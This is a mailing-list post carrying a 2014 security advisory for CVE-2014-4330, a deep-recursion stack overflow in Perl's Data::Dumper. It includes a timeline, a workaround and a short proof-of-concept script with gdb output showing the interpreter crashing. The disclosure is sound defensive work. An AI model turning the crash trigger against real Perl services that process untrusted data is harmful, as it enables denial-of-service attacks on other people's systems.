Follow @Openwall on Twitter for new release announcements and other news
[<prev] [next>] [day] [month] [year] [list]
Date: Thu, 25 Sep 2014 10:59:49 +0200
From: advisories <>
Subject: LSE Leading Security Experts GmbH - LSE-2014-06-10 - Perl CORE -
 Deep Recursion Stack Overflow

=== LSE Leading Security Experts GmbH - Security Advisory LSE-2014-06-10 ===

Perl CORE - Deep Recursion Stack Overflow

Affected Versions
Perl v5.20.1 and below

Issue Overview
Vulnerability Type: Stack Overflow
Technical Risk: high
Likelihood of Exploitation: low
Vendor: Perl
Vendor URL:
Credits: LSE Leading Security Experts GmbH employee Markus Vervier
Advisory URL:
Advisory Status: Public
CVE-Number: CVE-2014-4330

When the runtime stack grows over its maximal size, a guard page on most modern
operating systems is hit causing the Perl interpreter to crash.
Depending on context code execution on some architectures might be possible
if certain conditions are met.

Issue Description
During internal development a stack overflow was discovered when serializing
data via the Data::Dumper extension which is part of Perl-Core.
By using the "Dumper" method on a large Array-Reference which recursively
contains other Array-References, it is possible to cause many recursive
calls to the DD_dump native function and ultimately exhaust all available stack

Temporary Workaround and Fix
Applications written in Perl should ensure that a sanity check on data
serialized by Data::Dumper is performed.

According to the vendor a patch is available and coordinated with downstream

Proof of Concept
$ cat
use strict;
use Data::Dumper;

my $dumpme = [];
for (my $i = 0; $i < $ARGV[0]; $i++) {
	$dumpme = [$dumpme, "AAAAAAAA"];
print Dumper($dumpme);

$ gdb --args perl 20000
GNU gdb (GDB) 7.4.1-debian
Copyright (C) 2012 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
For bug reporting instructions, please see:
Reading symbols from /usr/bin/perl...Reading symbols from
(gdb) run
Starting program: /usr/bin/perl 20000
warning: no loadable sections found in added symbol-file system-supplied
DSO at
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/".

Program received signal SIGSEGV, Segmentation fault.
_IO_vfprintf_internal (s=0x7fffff7ff5c0, format=0x7ffff6bf5f89 "%ld",
    ap=0x7fffff7ff6f0) at vfprintf.c:1328
1328	vfprintf.c: No such file or directory.

It was confirmed that the overflow can be triggered via the XML::Parser
extension when parsing and dumping specially crafted XML-Documents.

2014-06-10 Issue discovery during internal development
2014-06-11 Vendor contacted
2014-06-11 Vendor reply
2014-06-13 CVE requested
2014-07-01 Vulnerability confirmed by vendor
2014-07-02 CVE-2014-4330 assigned
2014-09-25 Advisory released

GPG Signature
This advisory is signed with the GPG key of the
LSE Leading Security Experts GmbH advisories team.
The key can be downloaded here:

Download attachment "signature.asc" of type "application/pgp-signature" (820 bytes)

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.